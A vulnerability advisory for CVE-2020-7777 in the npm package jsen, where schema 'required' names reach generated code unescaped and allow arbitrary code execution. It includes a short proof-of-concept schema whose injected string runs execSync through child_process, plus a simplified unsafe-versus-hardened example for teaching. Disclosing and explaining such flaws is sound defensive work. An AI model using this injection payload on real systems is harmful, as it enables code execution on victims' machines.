CVE-2020-7777 – jsen
Package
Manager: npm
Name: jsen
Vulnerable Version: >=0 <=0.6.6
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
EPSS: 0.0098 (percentile: 0.75886)
Details
Code Injection in jsen

This affects all versions of package jsen. If an attacker can control the schema file, they could run arbitrary JavaScript code on the victim machine. In the module description and README file there is no mention of the risks of untrusted schema files, so it is assumed that this is applicable.

In particular, the `required` field of the schema is not properly sanitized. The resulting string that is built based on the schema definition is then passed to a `Function.apply();`, leading to Arbitrary Code Execution.

### PoC

```js
const jsen = require('jsen');

// The schema is parsed from JSON text, as it would be when read from a file.
let schema = JSON.parse(`
{
    "type": "object",
    "properties": {
        "username": {
            "type": "string"
        }
    },
    "required": ["\\"+process.mainModule.require(\'child_process\').execSync(\'touch malicious\')+\\""]
}`);

// jsen compiles the schema into a function; the "required" entry ends up in the generated source.
const validate = jsen(schema);
validate({});
```
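
The root cause described above, reduced to a simplified model with the unsafe interpolation beside a hardened form. This is an added example, not jsen's source and not part of the original advisory; the function names, the shape of the generated code and the harmless probe string are assumptions made for illustration.

```javascript
// Simplified model of a schema compiler (an assumption, not jsen's code):
// each "required" name is turned into JavaScript source, then compiled.
function build(checks) {
  const body = `const errors = [];\n${checks.join('\n')}\nreturn errors;`;
  return new Function('data', body);
}

// Unsafe: the name is pasted between double quotes in the generated source,
// so a name containing a double quote ends the literal and becomes code.
function compileRequiredUnsafe(schema) {
  return build((schema.required || []).map(
    (name) => `if (data["${name}"] === undefined) errors.push("${name}");`
  ));
}

// Hardened: JSON.stringify emits a fully escaped string literal, so the name
// stays data whatever characters it contains.
function compileRequiredSafe(schema) {
  return build((schema.required || []).map((name) => {
    if (typeof name !== 'string') {
      throw new TypeError('"required" entries must be strings');
    }
    const literal = JSON.stringify(name);
    return `if (data[${literal}] === undefined) errors.push(${literal});`;
  }));
}

// Constructed sample: same shape as the advisory's payload, but the injected
// expression only sets a flag so the effect can be observed.
const PROBE = '"+(globalThis.probeRan = true)+"';

function runProbe(compile) {
  globalThis.probeRan = false;
  const errors = compile({ type: 'object', required: [PROBE] })({});
  return { executed: globalThis.probeRan, errors };
}

console.log('unsafe:', runProbe(compileRequiredUnsafe));
console.log('safe:  ', runProbe(compileRequiredSafe));
```

Escaping of this kind has to be applied at every point where schema text reaches generated code; `required` is only the field this advisory names.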
Metadata
Created: 2022-02-10T20:18:37Z
Modified: 2023-09-11T23:08:53Z
Source: MANUAL
CWE IDs: ["CWE-94"]
Alternative ID: GHSA-vm64-cfqx-3698
Finding: F422
Auto approve: 1